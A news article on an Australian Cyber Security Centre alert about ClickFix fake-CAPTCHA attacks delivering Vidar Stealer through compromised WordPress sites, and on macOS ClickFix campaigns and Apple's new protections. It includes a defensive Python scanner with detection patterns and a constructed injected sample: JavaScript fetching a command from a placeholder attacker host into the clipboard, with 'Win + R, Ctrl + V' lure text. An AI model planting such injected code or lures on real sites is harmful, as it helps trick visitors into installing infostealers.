The Australian Cyber Security Centre (ACSC) has stepped in to warn users of an active attack campaign targeting Windows users with Vidar Stealer malware, which is delivered through the so-called ClickFix social engineering technique.
This is the first time ACSC, part of the Australian Signals Directorate (ASD) intelligence agency, has issued a separate alert for ClickFix, an attack technique that has become increasingly common over the past few years.
ClickFix relies on tricking users into essentially hacking themselves by running commands that compromise their computers.
In the current attack, the threat actor uses a fake Cloudflare CAPTCHA verification prompt.
ACSC said that the attack uses compromised WordPress websites belonging to legitimate Australian businesses, which have the fake CAPTCHA code injected.
On the sites, malicious JavaScript code downloads an obfuscated Windows PowerShell command from an application programming interface (API) server controlled by the attacker and copies it into the clipboard of the user’s computer.
Once a user interacts with the fake CAPTCHA by clicking on “Verify that you are human”, a pop-up appears, asking the victim to run the command in the clipboard, with administrator privileges.
Vidar Stealer has been active since 2018, and ACSC said the malware’s command and control (C2) infrastructure is retrieved through dead-drop links hosted on publicly accessible services, such as bots on the messaging app Telegram and profiles on the gaming platform Steam.
That C2 infrastructure is designed to hinder detection and takedown efforts, ACSC wrote.
ACSC recommended that government entities, organisations, businesses and individuals implement its guidance on restricting the ability of untrusted applications and scripts to execute, to protect against ClickFix attacks.
WordPress administrators should patch their sites, and remove unused, unsupported and/or deprecated themes and plugins, to reduce the risk of compromise.
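For WordPress administrators reviewing their own pages, the following is an added example (not ACSC's or any vendor's tooling) of a heuristic scan for the injected fake-CAPTCHA pattern the alert describes: a script that writes to the visitor's clipboard, combined with lure text telling the visitor to run what was copied. The sample pages and the `attacker-api.example` host are constructed for illustration.

```python
"""Heuristic scan of a site's own pages for an injected ClickFix fake CAPTCHA.
Constructed example for this article; the sample pages below are made up."""
import re

SCRIPT_TAG = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
HTML_TAG = re.compile(r"<[^>]+>")

# A clipboard write alone is legitimate (copy buttons are common on shop sites).
CLIPBOARD_WRITE = re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]", re.I)
# Payload pulled from another origin at runtime: the "obfuscated command
# downloaded from an attacker-controlled API server" step in the alert.
REMOTE_FETCH = re.compile(r"\bfetch\(\s*['\"]https?://|new XMLHttpRequest", re.I)
# Lure wording that asks the visitor to paste and run something themselves.
RUN_LURE = re.compile(
    r"win(dows)?\s*(key)?\s*\+\s*r|ctrl\s*\+\s*v|run dialog|powershell|terminal"
    r"|verify (that )?you are human|i'?m not a robot",
    re.I,
)


def scan_page(html: str) -> dict:
    """Report which indicators are present; flag only the clipboard+lure combination."""
    scripts = " ".join(SCRIPT_TAG.findall(html))
    visible = HTML_TAG.sub(" ", SCRIPT_TAG.sub(" ", html))
    found = {
        "clipboard_write": bool(CLIPBOARD_WRITE.search(scripts)),
        "remote_fetch": bool(REMOTE_FETCH.search(scripts)),
        "run_lure": bool(RUN_LURE.search(visible) or RUN_LURE.search(scripts)),
    }
    found["suspicious"] = found["clipboard_write"] and found["run_lure"]
    return found


# Constructed samples: a genuine coupon copy button, and an injected fake CAPTCHA
# modelled on the alert (the attacker-api.example host is a placeholder).
BENIGN = """<p>Use code SAVE10 at checkout.</p><button id="cp">Copy code</button>
<script>document.getElementById("cp").onclick = () => navigator.clipboard.writeText("SAVE10");</script>"""
INJECTED = """<div class="cf-verify"><p>Verify that you are human</p>
<p>Press Win + R, then Ctrl + V and Enter to complete verification.</p></div>
<script>fetch("https://attacker-api.example/cmd").then(r => r.text())
  .then(cmd => navigator.clipboard.writeText(cmd));</script>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN), ("injected", INJECTED)):
        print(name, scan_page(page))
```

The benign page is not flagged despite writing to the clipboard, because no run-it-yourself lure accompanies it; the injected page trips all three indicators.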
Apple adds ClickFix protection
As the ClickFix problem grows, technology vendors are seeking to protect their users against attacks by building in detection for deceptive and dangerous commands.
Microsoft’s Defender Security Research Team (DSRT) documented a ClickFix campaign, active since early 2026, which purports to install system utilities as users visit what appear to be troubleshooting sites hosted on Medium, Craft and other locations.
Instead, the commands pasted into the macOS Terminal utility load infostealing malware such as Macsync, Shub Stealer and AMOS onto users’ computers.
These collect and exfiltrate media files, Apple iCloud data and macOS Keychain entries, along with cryptocurrency wallet keys.
The Defender team also found that in some variants of the campaign, the cryptocurrency wallets are replaced by trojanised versions.
Whereas running macOS application bundles through the graphical Finder file viewer is subject to the built-in Gatekeeper security utility protections such as code signing and notarisation, this is not the case for code executed in Terminal.
To counter the threat, Apple has updated the signatures for its XProtect anti-malware scanner.
Apple has also added a new security prompt in version 26.4 of macOS which explicitly warns users that what they pasted into Terminal may be malware and that the system has blocked it.
This is followed by further advice by Apple on how scammers encourage users to paste text into Terminal, to try to harm victims’ Macs and to compromise their privacy.